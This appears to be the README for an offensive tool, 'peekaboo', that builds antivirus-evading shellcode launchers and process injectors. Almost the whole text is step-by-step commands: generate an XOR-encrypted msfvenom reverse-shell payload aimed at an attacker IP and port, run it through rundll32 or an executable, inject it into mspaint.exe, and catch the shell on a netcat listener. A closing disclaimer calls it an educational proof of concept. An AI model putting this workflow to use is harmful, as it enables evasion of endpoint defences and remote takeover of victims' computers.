Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
XOR encryption and decryption for functions call and main payload - msfvenom
reverse shell as example.
check your IP:
ip a
run python script with flags:
python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1
run on powershell or cmd promt:
rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy
check your netcat listener:
check attacker ip:
ip a
run python script on linux (for example process mspaint.exe
):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2
.\peekaboo.exe
or click (if -m windows
param)
check your netcat listener:
run python script on linux (for example process mspaint.exe
):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3
.\peekaboo.exe
Tested on:
02 september 2021
30 december 2021 (NT API injector)
11 january 2022 (NT API injector)
https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9
This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause